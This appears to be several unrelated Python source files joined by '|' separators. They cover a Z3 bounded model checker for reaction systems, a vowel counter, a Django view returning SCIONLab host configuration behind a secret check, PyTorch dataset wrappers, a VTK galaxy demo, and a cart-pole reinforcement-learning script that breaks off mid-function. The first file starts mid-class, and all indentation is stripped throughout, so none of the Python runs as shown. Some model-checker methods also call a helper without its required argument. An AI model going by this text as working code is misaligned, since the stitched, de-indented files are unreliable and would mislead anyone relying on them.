# "Currently" used variables (loaded from self.path_v...)
self.v = None
self.v_ctx = None
self.ca_state = None
# intermediate products:
self.v_improd = None
self.v_improd_for_entities = None
# Per-path variables
self.path_v = dict()
self.path_v_ctx = dict()
self.path_ca_state = dict()
# intermediate products:
self.path_v_improd = dict()
self.path_v_improd_for_entities = dict()
# parameters:
self.v_param = dict()
self.next_level_to_encode = 0
#
# WARNING: improd vs. improducible
# there is some confusion related to the variable naming:
#
# * improd - intermediate products
# * improducible - entities that are never produces (there is no reaction that produces that entity)
#
# TODO: number of loops == number of paths
self.loop_position = None
self.path_loop_position = dict()
if self.optimise:
self.solver = Optimize()
else:
self.solver = Solver() # For("QF_FD")
self.verification_time = None
self.prepare_param_variables()
def reset(self):
"""Reinitialises the state of the checker"""
self.initialise()
def prepare_all_variables(self, num_of_paths):
for path_idx in range(num_of_paths):
self.prepare_all_path_variables(path_idx)
self.next_level_to_encode += 1
def prepare_all_path_variables(self, path_idx):
"""Prepares the variables for a given path index"""
print_info("Preparing variables for path={:d} (level={:d})".format(
path_idx, self.next_level_to_encode))
self.prepare_state_variables(path_idx)
self.prepare_context_variables(path_idx)
self.prepare_intermediate_product_variables(path_idx)
self.prepare_loop_position_variables(path_idx)
def prepare_loop_position_variables(self, path_idx):
"""Prepares the variables for loop positions"""
self.path_loop_position[path_idx] = Int(
"p{:d}_loop_pos".format(path_idx))
def prepare_context_variables(self, path_idx):
"""Prepares all the context variables"""
level = self.next_level_to_encode
self.path_v_ctx.setdefault(path_idx, [])
assert len(self.path_v_ctx[path_idx]) == level
variables = []
for entity in self.rs.background_set:
new_var = Int("p{:d}C{:d}_{:s}".format(path_idx, level, entity))
variables.append(new_var)
self.path_v_ctx[path_idx].append(variables)
def prepare_state_variables(self, path_idx):
"""Prepares all the state variables"""
level = self.next_level_to_encode
# RS vars
self.path_v.setdefault(path_idx, [])
assert len(self.path_v[path_idx]) == level
variables = []
for entity in self.rs.background_set:
new_var = Int("p{:d}L{:d}_{:s}".format(path_idx, level, entity))
variables.append(new_var)
self.path_v[path_idx].append(variables)
# Context automaton states:
self.path_ca_state.setdefault(path_idx, [])
assert len(self.path_ca_state[path_idx]) == level
ca_state_var = Int("p{:d}CA{:d}_state".format(path_idx, level))
self.path_ca_state[path_idx].append(ca_state_var)
def prepare_intermediate_product_variables(self, path_idx):
"""
Prepares the intermediate product variables
carrying the individual concentration levels produced
by the reactions.
These variables are used later on to encode the final
concentration levels for all the entities
"""
level = self.next_level_to_encode
self.path_v_improd.setdefault(path_idx, [])
self.path_v_improd_for_entities.setdefault(path_idx, [])
if level < 1:
#
# If we are at level==0, we add a dummy "level"
# to match the indices of of the successors
# which are always at level+1.
#
self.path_v_improd[path_idx].append(None)
self.path_v_improd_for_entities[path_idx].append(None)
reactions_dict = dict()
number_of_reactions = len(self.rs.reactions)
all_entities_dict = dict()
for reaction in self.rs.reactions:
*_, products = reaction
reaction_id = self.rs.reactions.index(reaction)
entities_dict = dict()
if is_param(products):
for entity in self.rs.set_of_bgset_ids:
entity_name = self.rs.get_entity_name(entity)
new_var = Int("p{:d}L{:d}_ImProd_r{:d}_{:s}".format(
path_idx, level, reaction_id, entity_name))
entities_dict[entity] = new_var
all_entities_dict.setdefault(entity, [])
all_entities_dict[entity].append(new_var)
else:
for entity, conc in products:
entity_name = self.rs.get_entity_name(entity)
new_var = Int("p{:d}L{:d}_ImProd_r{:d}_{:s}".format(
path_idx, level, reaction_id, entity_name))
entities_dict[entity] = new_var
all_entities_dict.setdefault(entity, [])
all_entities_dict[entity].append(new_var)
reactions_dict[reaction_id] = entities_dict
self.path_v_improd[path_idx].append(reactions_dict)
self.path_v_improd_for_entities[path_idx].append(all_entities_dict)
def prepare_param_variables(self):
"""
Prepares variables for parameters
A parameter (it's valuation) is a subset of the background set,
therefore we need separate variables for each element of the
background set.
"""
for param_name in self.rs.parameters.keys():
# we start collecting bg-related vars for the given param
vars_for_param = []
for entity in self.rs.ordered_list_of_bgset_ids:
new_var = Int(
"Pm{:s}_{:s}".format(
param_name, self.rs.get_entity_name(entity)))
vars_for_param.append(new_var)
self.v_param[param_name] = vars_for_param
def get_enc_param(self, param_name, entity_name):
"""
Returns encoded param[entity_name]
"""
entity_id = self.rs.get_entity_id(entity_name)
return self.v_param[param_name][entity_id]
def load_varset_for_path(self, path_idx):
"""
Loads the the variables for the path with path_idx
"""
self.v = self.path_v[path_idx]
self.v_ctx = self.path_v_ctx[path_idx]
self.ca_state = self.path_ca_state[path_idx]
self.v_improd = self.path_v_improd[path_idx]
self.v_improd_for_entities = self.path_v_improd_for_entities[path_idx]
self.loop_position = self.path_loop_position[path_idx]
def enc_param_concentration_levels_assertion(self):
"""
Assertions for the parameter variables
"""
if len(self.v_param) == 0:
return True
enc_param_gz = True
enc_non_empty = True
for param_vars in self.v_param.values():
enc_param_at_least_one = False
for pvar in param_vars:
# TODO: fixed upper limit: 100 (have a per-param setting for that)
enc_param_gz = simplify(
And(enc_param_gz, pvar >= 0, pvar < 100))
enc_param_at_least_one = simplify(
Or(enc_param_at_least_one, pvar > 0))
enc_non_empty = simplify(
And(enc_non_empty, enc_param_at_least_one))
return simplify(And(enc_param_gz, enc_non_empty))
def assert_param_optimisation(self):
for param_vars in self.v_param.values():
for pvar in param_vars:
# self.solver.add_soft(pvar == 0)
self.solver.minimize(pvar)
def enc_concentration_levels_assertion(self, level, path_idx):
"""
Encodes assertions that (some) variables need to be >=0
We do not need to actually control all the variables,
only those that can possibly go below 0.
"""
print_info("Concentration level assertions for path={:d} (level={:d})".format(
path_idx, level))
enc_gz = True
for e_i in self.rs.set_of_bgset_ids:
var = self.path_v[path_idx][level][e_i]
var_ctx = self.path_v_ctx[path_idx][level][e_i]
e_max = self.rs.get_max_concentration_level(e_i)
enc_gz = simplify(And(enc_gz, var >= 0, var_ctx >=
0, var <= e_max, var_ctx <= e_max))
vars_per_reaction = self.path_v_improd_for_entities[path_idx][
level + 1]
if e_i in vars_per_reaction:
for var_improd in vars_per_reaction[e_i]:
enc_gz = simplify(
And(enc_gz, var_improd >= 0, var_improd <= e_max))
return enc_gz
def enc_init_state(self, level, path_idx):
"""Encodes the initial state at the given level"""
rs_init_state_enc = True
for v in self.path_v[path_idx][level]:
# the initial concentration levels are zeroed
rs_init_state_enc = simplify(And(rs_init_state_enc, v == 0))
ca_init_state_enc = self.path_ca_state[path_idx][level] == self.ca.get_init_state_id(
)
init_state_enc = simplify(And(rs_init_state_enc, ca_init_state_enc))
return init_state_enc
def enc_transition_relation(self, level, path_idx):
return simplify(
And(self.enc_rs_trans(level, path_idx),
self.enc_automaton_trans(level, path_idx)))
def enc_param_sanity_for_reactions(self):
"""R < I constraint (R n I = 0)"""
rct_inh_constr = True
for reactants, inhibitors, products in self.rs.reactions:
if is_param(reactants) or is_param(inhibitors):
# 1. R and I
if is_param(reactants) and is_param(inhibitors):
rct_param_name = reactants.name
inh_param_name = inhibitors.name
for entity in self.rs.set_of_bgset_ids:
rct_inh_constr = And(rct_inh_constr,
Implies(
self.v_param
[inh_param_name][entity] > 0,
self.v_param
[rct_param_name][entity] <
self.v_param
[inh_param_name][entity]))
elif (not is_param(reactants)) and is_param(inhibitors):
inh_param_name = inhibitors.name
for entity, conc in reactants:
assert conc > 0, "Unexpected concentration level!"
rct_inh_constr = And(
rct_inh_constr,
Implies(
self.v_param[inh_param_name][entity] > 0, conc <
self.v_param[inh_param_name][entity]))
elif is_param(reactants) and (not is_param(inhibitors)):
rct_param_name = reactants.name
for entity, conc in inhibitors:
assert conc > 0, "Unexpected concentration level!"
rct_inh_constr = And(
rct_inh_constr, self.v_param[rct_param_name][entity] < conc)
return rct_inh_constr
def enc_single_reaction(self, level, path_idx, reaction):
"""
Encodes a single reaction
For encoding the products we use intermediate variables:
* each reaction has its own product variables,
* those are meant to be used to compute the MAX concentration
"""
reactants, inhibitors, products = reaction
# we need reaction_id to find the intermediate product variable
reaction_id = self.rs.reactions.index(reaction)
# ** REACTANTS *******************************************
enc_reactants = True
if is_param(reactants):
param_name = reactants.name
for entity in self.rs.set_of_bgset_ids:
enc_reactants = And(enc_reactants, Or(
self.v_param[param_name][entity] == 0,
self.path_v[path_idx][level][entity] >= self.v_param[param_name][entity],
self.path_v_ctx[path_idx][level][entity] >= self.v_param[param_name][entity]))
else:
for entity, conc in reactants:
enc_reactants = And(enc_reactants, Or(
self.path_v[path_idx][level][entity] >= conc,
self.path_v_ctx[path_idx][level][entity] >= conc))
# ** INHIBITORS ******************************************
enc_inhibitors = True
if is_param(inhibitors):
param_name = inhibitors.name
for entity in self.rs.set_of_bgset_ids:
enc_inhibitors = And(enc_inhibitors, Or(
self.v_param[param_name][entity] == 0,
And(
self.path_v[path_idx][level][entity] < self.v_param[param_name][entity],
self.path_v_ctx[path_idx][level][entity] < self.v_param[param_name][entity])))
else:
for entity, conc in inhibitors:
enc_inhibitors = And(enc_inhibitors, And(
self.path_v[path_idx][level][entity] < conc,
self.path_v_ctx[path_idx][level][entity] < conc))
# ** PRODUCTS *******************************************
enc_products = True
if is_param(products):
param_name = products.name
for entity in self.rs.set_of_bgset_ids:
enc_products = simplify(
And(
enc_products, self.
path_v_improd[path_idx]
[level + 1][reaction_id]
[entity] == self.v_param
[param_name][entity]))
else:
for entity, conc in products:
enc_products = simplify(And(
enc_products, self.path_v_improd[path_idx][level + 1][reaction_id][entity] == conc))
# Nothing is produced (when the reaction is disabled)
enc_no_prod = True
if is_param(products):
for entity in self.rs.set_of_bgset_ids:
enc_no_prod = And(
enc_no_prod, self.path_v_improd[path_idx][level + 1][reaction_id][entity] == 0)
else:
for entity, _ in products:
enc_no_prod = simplify(And(
enc_no_prod, self.path_v_improd[path_idx][level + 1][reaction_id][entity] == 0))
#
# (R and I) iff P
#
enc_enabled = And(enc_reactants, enc_inhibitors) == enc_products
#
# ~(R and I) iff P_zero
#
enc_not_enabled = Not(
And(enc_reactants, enc_inhibitors)) == enc_no_prod
enc_reaction = And(enc_enabled, enc_not_enabled)
return enc_reaction
def enc_general_reaction_enabledness(self, level, path_idx):
"""
General enabledness condition for reactions
The necessary condition for a reaction to be enabled is
that the state is not empty, i.e., at least one entity
is present in the current state.
This condition must be used when there are parametric reactions
because parameters could have all the entities set to zero and
that immediately allows for all the conditions on the reactants
to be fulfilled: (entity <= param) -> (0 <= 0)
"""
enc_cond = False
for entity in self.rs.set_of_bgset_ids:
enc_cond = simplify(
Or(enc_cond, self.path_v[path_idx][level][entity] > 0, self.path_v_ctx[path_idx][level][entity] > 0))
return enc_cond
def enc_rs_trans(self, level, path_idx):
"""Encodes the transition relation"""
#
# IMPORTANT NOTE
#
# We need to make sure we do something about the UNUSED ENTITIES
# that is, those that are never produced.
#
# They should have concentration levels set to 0.
#
# That needs to happen automatically (in the MAX encoding) -- for the parametric
# case it makes no sense to identify the entities that are never produced, unless
# we have no parameters as products (special case, so that could be an
# optimisation)
#
enc_trans = True
for reaction in self.rs.reactions:
enc_reaction = self.enc_single_reaction(level, path_idx, reaction)
enc_trans = simplify(And(enc_trans, enc_reaction))
# Next we encode the MAX concentration values:
# we collect those from the intermediate product variables
enc_max_prod = True
# Save all the intermediate product variables for a given level:
#
# - Intermediate products of (level+1) correspond to the next level
#
# {reactants & inhibitors}[level]
# =>
# {improd}[level+1]
# =>
# {products}[level+1]
#
current_v_improd_for_entities = self.path_v_improd_for_entities[path_idx][level + 1]
for entity in self.rs.set_of_bgset_ids:
per_reaction_vars = current_v_improd_for_entities.get(entity, [])
enc_max_prod = simplify(And(
enc_max_prod, self.path_v[path_idx][level + 1][entity] == self.enc_max(per_reaction_vars)))
# make sure at least one entity is >0
enc_general_cond = self.enc_general_reaction_enabledness(
level, path_idx)
enc_trans_with_max = simplify(
And(enc_general_cond, enc_max_prod, enc_trans))
# print(enc_trans_with_max)
return enc_trans_with_max
def enc_max(self, elements):
enc = None
if elements == []:
enc = 0
elif len(elements) == 1:
enc = z3_max(0, elements[0])
elif len(elements) > 1:
enc = 0
for i in range(len(elements) - 1):
enc = z3_max(enc, z3_max(elements[i], elements[i + 1]))
return enc
def enc_automaton_trans(self, level, path_idx):
"""Encodes the transition relation for the context automaton"""
enc_trans = False
for src, ctx, dst in self.ca.transitions:
src_enc = self.path_ca_state[path_idx][level] == src
dst_enc = self.path_ca_state[path_idx][level+1] == dst
all_ent = set(range(len(self.rs.background_set)))
incl_ctx = set([e for e, c in ctx])
excl_ctx = all_ent - incl_ctx
ctx_enc = True
for e, c in ctx:
ctx_enc = simplify(
And(ctx_enc, self.path_v_ctx[path_idx][level][e] == c))
for e in excl_ctx:
ctx_enc = simplify(
And(ctx_enc, self.path_v_ctx[path_idx][level][e] == 0))
cur_trans = simplify(And(src_enc, ctx_enc, dst_enc))
enc_trans = simplify(Or(enc_trans, cur_trans))
return enc_trans
def enc_exact_state(self, level, state):
"""Encodes the state at the given level with the exact concentration values"""
raise RuntimeError("Should not be used with RSC")
def enc_min_state(self, level, state):
"""Encodes the state at the given level with the minimal required concentration levels"""
enc = True
for ent, conc in state:
e_id = self.rs.get_entity_id(ent)
enc = And(enc, self.v[level][e_id] >= conc)
return simplify(enc)
def enc_state_with_blocking(self, level, prop):
"""Encodes the state at the given level with blocking certain concentrations"""
required, blocked = prop
enc = True
for ent, conc in required:
e_id = self.rs.get_entity_id(ent)
enc = And(enc, self.v[level][e_id] >= conc)
for ent, conc in blocked:
e_id = self.rs.get_entity_id(ent)
enc = And(enc, self.v[level][e_id] < conc)
return simplify(enc)
def decode_witness(self, max_level, path_idx, print_model=False):
"""
Decodes the witness
Also decodes the parameters
"""
m = self.solver.model()
if print_model:
print(m)
for level in range(max_level + 1):
print("\n{: >70}".format("[ level=" + repr(level) + " ]"))
print(" State: {", end=""),
for var_id in range(len(self.path_v[path_idx][level])):
var_rep = repr(m[self.path_v[path_idx][level][var_id]])
if not var_rep.isdigit():
raise RuntimeError(
"unexpected: representation is not a positive integer")
if int(var_rep) > 0:
print(
" " + self.rs.get_entity_name(var_id) + "=" + var_rep,
end="")
print(" }")
if level != max_level:
print(" Context set: ", end="")
print("{", end="")
for var_id in range(len(self.path_v[path_idx][level])):
var_rep = repr(m[self.path_v_ctx[path_idx][level][var_id]])
if not var_rep.isdigit():
raise RuntimeError(
"unexpected: representation is not a positive integer")
if int(var_rep) > 0:
print(
" " + self.rs.get_entity_name(var_id) + "=" + var_rep,
end="")
print(" }")
print()
def get_enc_formulae(self, encoder, formulae_list):
enc_form = []
for formula in formulae_list:
path_idx = formulae_list.index(formula)
print_info("Generating the encoding for {:s} ({:d} of {:d})".format(
str(formula), path_idx+1, len(formulae_list)))
encoder.load_variables(
var_rs=self.path_v[path_idx],
var_ctx=self.path_v_ctx[path_idx],
var_loop_pos=self.path_loop_position[path_idx])
enc_form.append(encoder.get_encoding(formula, self.current_level))
ncalls = encoder.get_ncalls()
print_info("Cache hits: {:d}, encode calls: {:d} (approx: {:d})".format(
encoder.get_cache_hits(), ncalls[0], ncalls[1]))
encoder.flush_cache()
return enc_form
def print_witness(self, formulae_list):
for formula in formulae_list:
path_idx = formulae_list.index(formula)
print("\n{:=^70}".format("[ WITNESS ]"))
print("\n Witness for: {:s}".format(str(formula)))
self.decode_witness(self.current_level, path_idx)
self.print_parameter_valuations()
def print_parameter_valuations(self):
m = self.solver.model()
print("\n Parameters:\n")
for param_name in sorted(self.rs.parameters.keys()):
print("{: >6}: ".format(param_name), end="")
print("{", end="")
params = self.v_param[param_name]
for entity in self.rs.set_of_bgset_ids:
var_rep = repr(m[params[entity]])
if not var_rep.isdigit():
raise RuntimeError(
"unexpected: representation is not a positive integer")
if int(var_rep) > 0:
print(
" " + str(self.rs.get_entity_name(entity)) + "=" +
str(var_rep),
end="")
print(" }")
print()
def enc_concentration_levels_assertions_for_paths(
self, level, num_of_paths):
additional_assertions = []
for path_idx in range(num_of_paths):
additional_assertions.append(
self.enc_concentration_levels_assertion(level, path_idx))
additional_assertions.append(
self.enc_param_concentration_levels_assertion())
return additional_assertions
def enc_transition_relation_for_paths(self, level, num_of_paths):
enc_trans = []
for path_idx in range(num_of_paths):
enc_trans.append(self.enc_transition_relation(level, path_idx))
return enc_trans
def print_level(self):
print(
"{:->70}".format("[ level=" + str(self.current_level) + " done ]"))
def check_rsltl(
self, formulae_list,
print_witness=True,
print_time=True, print_mem=True,
max_level=None, cont_if_sat=False,
param_constr=None):
"""
Bounded Model Checking for rsLTL properties
* print_witness -- prints the decoded witness
* print_time -- prints the time consumed
* print_mem -- prints the memory consumed
* max_level -- if not None, the methods
stops at the specified level
* cont_if_sat -- if True, then the method
continues up until max_level is
reached (even if sat found)
* param_constr -- constraints on parameters
"""
if not isinstance(formulae_list, (list, tuple)):
print_error("Expected a list of formulae")
self.reset()
num_of_paths = len(formulae_list)
print_info("Running rsLTL bounded model checking")
print_info("Tested formulae:")
for form in formulae_list:
print_info(" "*4 + str(form))
print_info("INITIALISING...")
if print_time:
start_time = resource.getrusage(resource.RUSAGE_SELF).ru_utime
self.prepare_all_variables(num_of_paths)
self.load_varset_for_path(0)
# initial states for all the paths
initial_states = []
for path_idx in range(num_of_paths):
initial_states.append(self.enc_init_state(0, path_idx))
self.solver_add(initial_states)
self.current_level = 0
# assertions for all the paths and parameters
self.solver_add(
self.enc_concentration_levels_assertions_for_paths(
0, num_of_paths))
self.solver_add(self.enc_param_concentration_levels_assertion())
self.solver_add(self.enc_param_sanity_for_reactions())
encoder = rsLTL_Encoder(self)
if param_constr:
param_contr_encoder = ParamConstr_Encoder(self)
enc_param_constr = param_contr_encoder.encode(param_constr)
self.solver_add(enc_param_constr)
if self.optimise:
self.assert_param_optimisation()
print_info("STARTING TO ITERATE...")
while True:
print(
"\n{:-^70}".format("[ Working at level=" + str(self.current_level) + " ]"))
# reachability test:
self.solver.push()
# Encoding all the formulae
enc_form = self.get_enc_formulae(encoder, formulae_list)
print_info("Adding the formulae to the solver...")
self.solver_add(enc_form)
# Loops encoding
print_info("Adding the encoding for the loops...")
self.solver_add(self.get_loop_encodings())
print_info("Testing satisfiability...")
result = self.solver.check()
if result == sat:
print_positive(green_str(
"SAT at level={:d}".format(self.current_level)))
# print(self.solver.model())
if print_witness:
self.print_witness(formulae_list)
if not cont_if_sat:
break
else:
print_info("UNSAT")
self.solver.pop()
if not max_level is None and self.current_level > max_level:
print_info("As requested, stopping at level=" + str(max_level))
break
self.prepare_all_variables(num_of_paths)
# assertions for all the paths
self.solver_add(
self.enc_concentration_levels_assertions_for_paths(
self.current_level + 1, num_of_paths))
print_info("Unrolling the transition relation")
self.solver_add(self.enc_transition_relation_for_paths(
self.current_level, num_of_paths))
self.print_level()
self.current_level += 1
if print_time:
self.print_time(start_time)
if print_mem:
self.print_mem()
def print_time(self, start):
stop = resource.getrusage(resource.RUSAGE_SELF).ru_utime
self.verification_time = stop - start
print()
print_info("{: >60}".format(
" Time: " + repr(self.verification_time) + " s"))
def print_mem(self):
print_info(
"{: >60}".format(
" Memory: " +
repr(
resource.getrusage(resource.RUSAGE_SELF).ru_maxrss /
(1024 * 1024)) + " MB"))
def dummy_unroll(self, levels):
"""Unrolls the variables for testing purposes"""
self.current_level = -1
for i in range(levels+1):
self.prepare_all_variables()
self.current_level += 1
print(C_MARK_INFO + " Dummy Unrolling done.")
def state_equality(self, level_A, level_B):
"""Encodes equality of two states at two different levels"""
eq_enc = True
for e_i in range(len(self.rs.background_set)):
e_i_equality = self.v[level_A][e_i] == self.v[level_B][e_i]
eq_enc = simplify(And(eq_enc, e_i_equality))
eq_enc_ctxaut = self.ca_state[level_A] == self.ca_state[level_B]
eq_enc = simplify(And(eq_enc, eq_enc_ctxaut))
return eq_enc
def get_loop_encodings(self):
k = self.current_level
loop_var = self.loop_position
loop_enc = True
"""
(loop_var == i) means that there is a loop taking back to the state (i-1)
Therefore, the encoding starts at 1, not at 0.
"""
for i in range(1, k+1):
loop_enc = simplify(And(loop_enc, Implies(
loop_var == i, self.state_equality(i-1, k))))
return loop_enc
def solver_add(self, expression):
"""
This is a solver.add() wrapper
"""
if expression == True:
return
if expression == False:
raise RuntimeError("Trying to assert False.")
self.solver.add(expression)
def check_reachability(self, state, print_witness=True,
print_time=True, print_mem=True, max_level=1000):
"""Main testing function"""
self.reset()
if print_time:
# start = time()
start = resource.getrusage(resource.RUSAGE_SELF).ru_utime
self.prepare_all_variables()
self.solver_add(self.enc_init_state(0))
self.current_level = 0
self.prepare_all_variables()
self.solver_add(self.enc_concentration_levels_assertion(0))
while True:
self.prepare_all_variables()
self.solver_add(
self.enc_concentration_levels_assertion(
self.current_level + 1))
print(
"\n{:-^70}".format("[ Working at level=" + str(self.current_level) + " ]"))
stdout.flush()
# reachability test:
print("[" + colour_str(C_BOLD, "i") +
"] Adding the reachability test...")
self.solver.push()
self.solver_add(self.enc_state_with_blocking(
self.current_level, state))
result = self.solver.check()
if result == sat:
print(
"[" + colour_str(C_BOLD, "+") + "] " +
colour_str(
C_GREEN, "SAT at level=" + str(self.current_level)))
if print_witness:
print("\n{:=^70}".format("[ WITNESS ]"))
self.decode_witness(self.current_level)
break
else:
self.solver.pop()
print("[" + colour_str(C_BOLD, "i") +
"] Unrolling the transition relation")
self.solver_add(self.enc_transition_relation(self.current_level))
print(
"{:->70}".format("[ level=" + str(self.current_level) + " done ]"))
self.current_level += 1
if self.current_level > max_level:
print("Stopping at level=" + str(max_level))
break
if print_time:
# stop = time()
stop = resource.getrusage(resource.RUSAGE_SELF).ru_utime
self.verification_time = stop-start
print()
print(
"\n[i] {: >60}".format(
" Time: " + repr(self.verification_time) + " s"))
if print_mem:
print(
"[i] {: >60}".format(
" Memory: " +
repr(
resource.getrusage(resource.RUSAGE_SELF).ru_maxrss /
(1024 * 1024)) + " MB"))
def get_verification_time(self):
return self.verification_time
def show_encoding(self, state, print_witness=True,
print_time=False, print_mem=False, max_level=100):
"""Encoding debug function"""
self.reset()
self.prepare_all_variables()
init_s = self.enc_init_state(0)
print(init_s)
self.solver_add(init_s)
self.current_level = 0
self.prepare_all_variables()
while True:
self.prepare_all_variables()
print(
"-----[ Working at level=" + str(self.current_level) + " ]-----")
stdout.flush()
# reachability test:
print("[i] Adding the reachability test...")
self.solver.push()
s = self.enc_min_state(self.current_level, state)
print("Test: ", s)
self.solver_add(s)
result = self.solver.check()
if result == sat:
print(
"\n[+] " +
colour_str(
C_RED, "SAT at level=" + str(self.current_level)))
if print_witness:
self.decode_witness(self.current_level)
break
else:
self.solver.pop()
print("[i] Unrolling the transition relation")
t = self.enc_transition_relation(self.current_level)
print(t)
self.solver_add(t)
print("-----[ level=" + str(self.current_level) + " done ]")
self.current_level += 1
if self.current_level > max_level:
print("Stopping at level=" + str(max_level))
break
else:
x = input("Next level? ")
x = x.lower()
if not (x == "y" or x == "yes"):
break
# EOF
|
#Program to count no. of vowels in the string
def main():
x=input("Enter a string")
b={'a','e','i','o','u'}
for i in b:
y=x.count(i);
if(y>0):
print(i,"present",y,"times")
if __name__=='__main__':
main()
|
# Copyright 2018 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hmac
from django.views import View
from django.views.generic.detail import SingleObjectMixin
from django.http import (
HttpResponse,
HttpResponseBadRequest,
HttpResponseForbidden,
HttpResponseNotModified
)
from scionlab.models import Host
from scionlab.util.http import HttpResponseAttachment
from scionlab.util import config_tar
class GetHostConfig(SingleObjectMixin, View):
model = Host
def get(self, request, *args, **kwargs):
host = self.get_object()
if 'secret' not in request.GET \
or not hmac.compare_digest(request.GET['secret'], host.secret):
return HttpResponseForbidden()
if 'version' in request.GET:
version_str = request.GET['version']
if not version_str.isnumeric():
return HttpResponseBadRequest()
version = int(version_str)
if version >= host.config_version:
return HttpResponseNotModified()
if config_tar.is_empty_config(host):
return HttpResponse(status=204)
# All good, return generate and return the config
# Use the response as file-like object to write the tar
filename = '{host}_v{version}.tar.gz'.format(
host=host.path_str(),
version=host.config_version)
resp = HttpResponseAttachment(filename=filename, content_type='application/gzip')
config_tar.generate_host_config_tar(host, resp)
return resp
|
#!/usr/bin/env python
import torch
from torch.utils.data.dataset import Dataset
# Wrapper class to return only subset of samples of original dataset
class MaskedDataset(Dataset):
def __init__(self, dataset, mask=None):
self.dataset = dataset
if mask is not None:
self.mask = mask.byte()
if len(self.mask) != len(self.dataset):
raise TypeError("Length of mask and dataset must match.")
self.idxs = self.mask.nonzero().long().reshape(-1)
else: # don't mask anything
self.mask = torch.ones(len(self.dataset)).byte()
self.idxs = torch.arange(0, len(self.dataset)).long()
def __getitem__(self, idx):
data, target = self.dataset[self.idxs[idx]]
return data, target
def __len__(self):
return len(self.idxs)
# Wrapper class to return samples with sample idx
class IndexedDataset(Dataset):
def __init__(self, dataset):
self.dataset = dataset
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
return (idx, *self.dataset[idx])
|
import vtk
import numpy as np
from netCDF4 import Dataset
import sys
sys.path.append('../framework/')
import framework
#********************* CODE SPECIFIC TO DEMO ********************************
#Data transfer object
class DTO:
def SetData(self,data):
self.Data=data
def GetData(self):
return self.Data
#class containing demo-specific functions
class galaxydemo(framework.abstractdemo):
# read in data and convert it to a data transfer object
def GetVTKData(self,root): #root=netcdf handle
#create numpy arrays
x=root.variables['x'][:]
y=root.variables['y'][:]
z=root.variables['z'][:]
n=x.size
#create vtk objects from numpy arrays
points=vtk.vtkPoints()
vertices = vtk.vtkCellArray()
#loop over points in data and add them to the vtkpoints and vtkvertices objects
for i in range(0,n):
id = points.InsertNextPoint(x[i],y[i],z[i])
vertices.InsertNextCell(1)
vertices.InsertCellPoint(id)
# Create a polydata object
galaxy = vtk.vtkPolyData()
# Set the points and vertices we created as the geometry and topology of the polydata
galaxy.SetPoints(points)
galaxy.SetVerts(vertices)
#create writer to write polydata to an xml string to be sent to main process
writer=vtk.vtkXMLPolyDataWriter()
writer.SetInputData(galaxy)
writer.WriteToOutputStringOn()
writer.Write()
xml=writer.GetOutputString()
#create data transfer object and put the xml string into it
data=DTO()
data.SetData(xml)
return data
# Renders a frame with data contained within the data transfer object, data
def RenderFrame(self,win,data):
#unpack xml string from data transfer object
xml=data.GetData()
#read in xml data
reader=vtk.vtkXMLPolyDataReader()
reader.ReadFromInputStringOn()
reader.SetInputString(xml)
reader.Update()
#update mapper
win.mapper.SetInputConnection(reader.GetOutputPort())
try: #does the actor exist? if not, create one
win.actor
except:
win.actor=vtk.vtkActor()
win.renderer.AddActor(win.actor)
win.actor.SetMapper(win.mapper)
#update renderer
win.widget.GetRenderWindow().Render()
def GetFilename(self,num):
return "data/data%5.5d.nc"%num #get filename
#************************** END OF DEMO SPECIFIC CODE ******************************
#Launch demo
if __name__ == '__main__':
demo=galaxydemo()
framework.Start("Galaxy Simulator",demo)
|
import configargparse
import torch
import torch.optim as optim
from environments import CartPoleRegulatorEnv
from environments import CartEnv
from environments import AcrobotEnv
from models.agents import NFQAgent
from models.networks import NFQNetwork, ContrastiveNFQNetwork, ContrastiveLinearModel
# from simulated_fqi import NFQAgent
# from simulated_fqi import NFQNetwork, ContrastiveNFQNetwork
from util import get_logger, close_logger, load_models, make_reproducible, save_models
import matplotlib.pyplot as plt
import numpy as np
import itertools
from train_cnfqi import run
def run_lm(
verbose=True,
is_contrastive=False,
epoch=1000,
train_env_max_steps=100,
eval_env_max_steps=3000,
discount=0.95,
init_experience_bg=200,
init_experience_fg=200,
fg_only=False,
increment_experience=0,
hint_to_goal=0,
evaluations=5,
force_left=5,
random_seed=1234,
):
# Setup environment
bg_cart_mass = 1.0
fg_cart_mass = 1.0
train_env_bg = CartPoleRegulatorEnv(
group=0,
masscart=bg_cart_mass,
mode="train",
force_left=force_left,
is_contrastive=is_contrastive,
fg_only=fg_only,
)
train_env_fg = CartPoleRegulatorEnv(
group=1,
masscart=fg_cart_mass,
mode="train",
force_left=force_left,
is_contrastive=is_contrastive,
fg_only=fg_only,
)
eval_env_bg = CartPoleRegulatorEnv(
group=0,
masscart=bg_cart_mass,
mode="eval",
force_left=force_left,
is_contrastive=is_contrastive,
fg_only=fg_only,
)
eval_env_fg = CartPoleRegulatorEnv(
group=1,
masscart=fg_cart_mass,
mode="eval",
force_left=force_left,
is_contrastive=is_contrastive,
fg_only=fg_only,
)
# make_reproducible(random_seed, use_numpy=True, use_torch=True)
# train_env_bg.seed(random_seed)
# train_env_fg.seed(random_seed)
# eval_env_bg.seed(random_seed)
# eval_env_fg.seed(random_seed)
# Log to File, Console, TensorBoard, W&B
logger = get_logger()
# Setup agent
nfq_net = ContrastiveLinearModel(
state_dim=train_env_bg.state_dim, is_contrastive=is_contrastive
)
# optimizer = optim.Rprop(nfq_net.parameters())
if is_contrastive:
optimizer = optim.Adam(
itertools.chain(nfq_net.layers_shared.parameters()), lr=1e-1
)
else:
optimizer = optim.Adam(nfq_net.parameters(), lr=1e-1)
nfq_agent = NFQAgent(nfq_net, optimizer)
# NFQ Main loop
# A set of transition samples denoted as D
bg_rollouts = []
fg_rollouts = []
total_cost = 0
for _ in range(init_experience_bg):
rollout_bg, episode_cost = train_env_bg.generate_rollout(
None, render=False, group=0
)
bg_rollouts.extend(rollout_bg)
for _ in range(init_experience_fg):
rollout_fg, episode_cost = train_env_fg.generate_rollout(
None, render=False, group=1
)
fg_rollouts.extend(rollout_fg)
total_cost += episode_cost
# import ipdb; ipdb.set_trace()
bg_rollouts.extend(fg_rollouts)
all_rollouts = bg_rollouts.copy()
